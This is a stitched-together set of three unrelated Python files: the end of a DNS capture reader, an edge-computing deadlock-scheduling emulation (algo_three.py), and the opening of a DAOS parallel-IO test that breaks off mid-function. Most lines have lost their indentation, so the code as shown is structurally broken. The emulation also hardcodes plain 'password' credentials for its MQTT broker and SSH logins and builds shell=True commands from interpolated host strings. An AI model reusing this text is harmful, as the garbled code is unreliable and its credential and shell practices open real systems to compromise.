            self.curs.execute("CREATE TABLE dnsmappings(Id INTEGER PRIMARY KEY AUTOINCREMENT, timestamp INT, fqdn TEXT, ip INT, clientID INT)")
self.curs.execute("CREATE INDEX ip_idx ON dnsmappings (fqdn);")
self.conn.commit()
elif self.dbserver:
import MySQLdb
serverIP,dbuser,dbpass,dbname=self.dbserver
self.conn = MySQLdb.connect(serverIP,dbuser,dbpass,dbname)
self.curs=self.conn.cursor()
self.curs.execute("CREATE TABLE dnsmappings(Id BIGINT AUTO_INCREMENT, timestamp int unsigned, fqdn varchar(255), ip int unsigned, clientID int unsigned, PRIMARY KEY (Id), INDEX(fqdn))")
self.conn.commit()
return self
def __exit__(self, *exc_info):
if (self.mode==INPUTMODE_FIFO or self.mode==INPUTMODE_PROTOBUF or
self.mode==INPUTMODE_PCAP_FILE) and self.infile!=sys.stdin:
self.infile.close()
if self.dbfile or self.dbserver:
self.conn.commit()
self.conn.close()
    def __iter__(self):
        # nnext() is a generator function, so return the generator it creates;
        # the previous next() wrapper produced a brand-new generator on every
        # call, which broke 'for record in recGen(...)'.
        return self.nnext()
def nnext(self):
q = mp.Queue(10000)
exitSignal = mp.Event()
if self.mode==INPUTMODE_FIFO:
proc = mp.Process(target=fifoReader, args=(self.infile, q, exitSignal))
elif self.mode==INPUTMODE_PROTOBUF:
if self.gzippedInput:
proc = mp.Process(target=protobufReader, args=(self.infile, q, exitSignal,
self.thrsh, False))
else:
proc = mp.Process(target=protobufReader, args=(self.infile, q, exitSignal,
self.thrsh, self.useProgressbar))
elif self.mode==INPUTMODE_PCAP_FILE:
proc = mp.Process(target=pcapReader, args=(q, exitSignal,),
kwargs={'thrsh':self.thrsh, 'infile':self.inputSource})
elif self.mode==INPUTMODE_PCAP_IF:
proc = mp.Process(target=pcapReader, args=(q, exitSignal,),
kwargs={'thrsh':self.thrsh, 'interface':self.inputSource})
proc.daemon = True
proc.start()
while True:
try:
try:
data = q.get(timeout=1) # this is the only consumer and the queue is not empty, so it returns the next item immediately
except Queue.Empty:
"""
read timeout: return an empty record to keep the DNSMap going
"""
yield ((None, None, []), None)
continue
else:
if data == None:
break
else:
if self.dbfile or self.dbserver:
(queriedName, clientID, ips,ttl), timestamp = data
dumpToDatabase(self.curs, timestamp, queriedName,
ips, clientID, self.dbtable)
yield data
except KeyboardInterrupt:
"""
kill the reader process
"""
exitSignal.set()
def recordTypeToStr(rec_type):
try:
return DNS_RECORD_TYPES_[rec_type]
    except KeyError:
return 'UNKNOWN'
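# Example (sketch, the file name is illustrative): reading NOERROR A-record
# mappings from a pcap capture.  In pcap mode each record is
# ((fqdn, resolver_ip, set_of_IPAddress, ttl), timestamp); keep-alive records
# emitted on read timeouts carry a None timestamp and an empty IP list.
#
#   with recGen('capture.pcap', mode=INPUTMODE_PCAP_FILE) as gen:
#       for record in gen:
#           if record[1] is None:
#               continue
#           print record[1], record[0][0], [str(ip) for ip in record[0][2]]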
if __name__ == "__main__":
import sys
r=recGen(mode=INPUTMODE_PROTOBUF, inputSource=sys.argv[1],
thrsh=0, useProgressbar=False, gzippedInput=True)
for record in r:
for ip in record[0][2]:
print record[1], record[0][0], str(ip)
|
algo_three.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
import argparse
import pickle
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
task_record = {} # keeps record of task reoffloaded
task_id = 0
shared_resource_lock = threading.Lock()
t_track = 1
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
# cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
cmd = ['ifconfig ens4 | grep inet | head -n 1 | cut -d "t" -f 2 | cut -d " " -f 2']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
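# scheduler() simulates one hyperperiod (the LCM of all task periods) in unit
# time steps: at every step the queued job with the earliest absolute deadline
# runs for one unit, finished jobs are dequeued, and preemptions are marked in
# the trace.  The returned sequence has the idle task filtered out and is
# expanded to per-unit execution slots by task_time_map().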
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
# generate execution sequence
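# wound_wait() walks the pending processes and runs any whose resource need
# fits within the available vector; when a process cannot proceed it offloads
# the peer currently holding the largest allocation (if reclaiming it would
# unblock the waiter) or, failing that, the blocked process itself, so the
# system never stays deadlocked.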
def wound_wait(processes, avail, n_need, allocat):
global deadlock
offload = []
# To store execution sequence
exec_seq = []
    # completion flags, one per process (0 = not yet executed or offloaded)
    work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
while 0 in work:
ind = work.index(0)
i = processes[ind]
# print('comparing| process: ', i, n_need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', _need[_max])
if not (False in list(np.greater_equal(np.array(avail) + np.array(allocat[_max]), n_need[i]))):
offload.append(_max)
avail = np.array(avail) + np.array(allocat[_max])
work[processes.index(_max)] = 1
else:
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
if len(offload) > 0:
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print('Execution seq: ', exec_seq)
return exec_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wound_wait(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
    # advertised waiting time = total completion time / 2 (the plain average
    # waiting time tends to be too tight)
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
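    # e.g. with samples 10, 20, 30: μ1 = 10, μ2 = (1*10 + 20)/2 = 15,
    # μ3 = (2*15 + 30)/3 = 20 -- the running mean without storing all samples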
return round(avg1, 4)
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
                        address[0]))  # calculate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
# if len(exec_list) != len(offloaded_task[0]):
# print('\n\n', '@ ' * 50)
# print('exec: ', exec_list, 'off: ', offloaded_task[0])
# print('\n\n', '@ ' * 50)
# offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
outward_mec += 1
offload_check[0] += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
offload_check[1] += len(o)
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+wound-wait {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
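# mec_id() zero-pads the last octet of an IPv4 address to three characters,
# e.g. '192.168.0.7' -> '007', so node ids have a fixed width.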
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"wt{_id_}_7_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_7_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_7_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}" \
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
f"\ncooperate = {cooperate} \ntask_record = {task_record}" \
f"\noutward_mec = {outward_mec}"
list_result = [
f"wt{_id_}_7_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} \noff_cloud{_id_}_7_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_7_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}",
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}",
f"\ncooperate = {cooperate} \ntask_record = {task_record} \noutward_mec = {outward_mec}"
]
file_ = open(f'{_id_}_7_{mec_no}datap.py', 'w')
for i in list_result:
file_.write(i)
file_.close()
cmd = f'mv {_id_}_7_{mec_no}datap.py {send_path}'
os.system(cmd)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
run = 1 # tell agents child when to stop
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
print('========= Waiting for tasks ==========')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('EDF List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(.4)
except KeyboardInterrupt:
print('\nProgramme Terminated')
            stop = True  # signal helper threads to stop before exiting
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
break
print('algo stopped!')
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('send alert to control')
time.sleep(r.uniform(1, 10))
_client.publish('control/control', pickle.dumps(['stop', ip_address()]))
print('Terminating process')
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def main():
# (hosts_, mec_no_, cloud_ip_, send_path, broker_ip_) , (--hosts, --mec_no_, --cloud_ip, --s_path, --b_ip)
parser = argparse.ArgumentParser()
parser.add_argument('--hosts', type=str, help="{hostname: 'ip address', ...} of all mec")
parser.add_argument('--mec_no', type=int, default=1.0, help='Number of MEC nodes')
parser.add_argument('--cloud_ip', type=str, help="cloud ip address")
parser.add_argument('--s_path', type=str, default='/home/mec/result/python', help='Path to send result to')
parser.add_argument('--b_ip', type=str, help='Broker ip address')
args = parser.parse_args()
h_hosts = ast.literal_eval(args.hosts)
run_me(hosts_=h_hosts, mec_no_=args.mec_no, cloud_ip_=args.cloud_ip, send_path=args.s_path, broker_ip_=args.b_ip)
if __name__ == '__main__':
main()
|
parallel_io.py
|
#!/usr/bin/python
"""
(C) Copyright 2020 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Government's rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
"""
import threading
import subprocess
import time
from getpass import getuser
import general_utils
from ClusterShell.NodeSet import NodeSet
from command_utils import CommandFailure
from daos_utils import DaosCommand
from test_utils_pool import TestPool
from test_utils_container import TestContainer
from dfuse_utils import Dfuse
from fio_test_base import FioBase
from ior_test_base import IorTestBase
# pylint: disable=too-many-ancestors
class ParallelIo(FioBase, IorTestBase):
"""Base Parallel IO test class.
:avocado: recursive
"""
def __init__(self, *args, **kwargs):
"""Initialize a ParallelIo object."""
super(ParallelIo, self).__init__(*args, **kwargs)
self.dfuse = None
self.cont_count = None
self.pool_count = None
self.statvfs_info_initial = None
self.statvfs_before_cont_destroy = None
self.statvfs_after_cont_destroy = None
self.pool = []
self.container = []
def setUp(self):
"""Set up each test case."""
# Start the servers and agents
super(ParallelIo, self).setUp()
def tearDown(self):
"""Tear down each test case."""
try:
if self.dfuse:
self.dfuse.stop()
finally:
# Stop the servers and agents
super(ParallelIo, self).tearDown()
def create_pool(self):
"""Create a TestPool object to use with ior."""
# Get the pool params
pool = TestPool(
self.context, dmg_command=self.get_dmg_command())
pool.get_params(self)
# Create a pool
pool.create()
self.pool.append(pool)
# pylint: disable=arguments-differ
def create_cont(self, pool):
"""Create a TestContainer object to be used to create container.
Args:
pool (TestPool): TestPool object type for which container
needs to be created
"""
# Get container params
container = TestContainer(
pool, daos_command=DaosCommand(self.bin))
container.get_params(self)
# create container
container.create()
self.container.append(container)
def start_dfuse(self, pool=None):
"""Create a DfuseCommand object to start dfuse.
Args:
pool (TestPool): Test pool object if dfuse is intended to be
started using pool uuid option.
"""
# Get Dfuse params
self.dfuse = Dfuse(self.hostlist_clients, self.tmp)
self.dfuse.get_params(self)
# update dfuse params
if pool:
self.dfuse.set_dfuse_params(pool)
self.dfuse.set_dfuse_exports(self.server_managers[0], self.client_log)
try:
# start dfuse
self.dfuse.run()
except CommandFailure as error:
self.log.error("Dfuse command %s failed on hosts %s",
str(self.dfuse),
self.dfuse.hosts,
exc_info=error)
self.fail("Test was expected to pass but it failed.\n")
def stat_bfree(self, path):
"""Get stat bfree
Args:
path (str): path to get free block size of.
Returns:
integer value of stat free blocks
"""
cmd = ["ssh", "{}@{}".format(getuser(), self.hostlist_clients[0]),
"stat -c%a -f {}".format(path)]
try:
result = subprocess.check_output(cmd)
except subprocess.CalledProcessError as err:
